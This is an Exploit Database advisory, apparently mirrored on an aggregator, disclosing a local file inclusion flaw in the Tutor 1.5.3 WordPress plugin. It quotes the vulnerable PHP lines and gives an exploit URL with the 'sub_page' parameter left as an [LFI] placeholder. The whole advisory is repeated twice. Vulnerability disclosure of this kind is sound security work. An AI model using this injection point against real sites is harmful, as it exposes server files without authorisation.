WordPress Plugin Tutor.1.5.3 – Local File Inclusion

• Exploit Database
• 44 阅读

• 作者： Mehran Feizi
  日期： 2020-02-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48058/

• #Tile: WordPress Plugin tutor.1.5.3 - Local File Inclusion
  #Author: mehran feizi
  #Category: webapps
  #Date: 2020-02-12
  #vendor home page: https://wordpress.org/plugins/tutor/
  
  ===================================================================
  Vulnerable page:
  /instructors.php
  ===================================================================
  Vulnerable Source:
  3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
  5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
  7: include include $include_file; 
  requires:
  4: if(!empty($sub_page))
  6: if(file_exists($include_file))
  ===================================================================
  Exploit:
  localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
  =================================================================================
  contact me:
  telegram: @MF0584
  gmail: mehranfeizi13841384@gmail.com
  ===================================================================
  Vulnerable page:
  /instructors.php
  ===================================================================
  Vulnerable Source:
  3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
  5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
  7: include include $include_file; 
  requires:
  4: if(!empty($sub_page))
  6: if(file_exists($include_file))
  ===================================================================
  Exploit:
  localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
  =================================================================================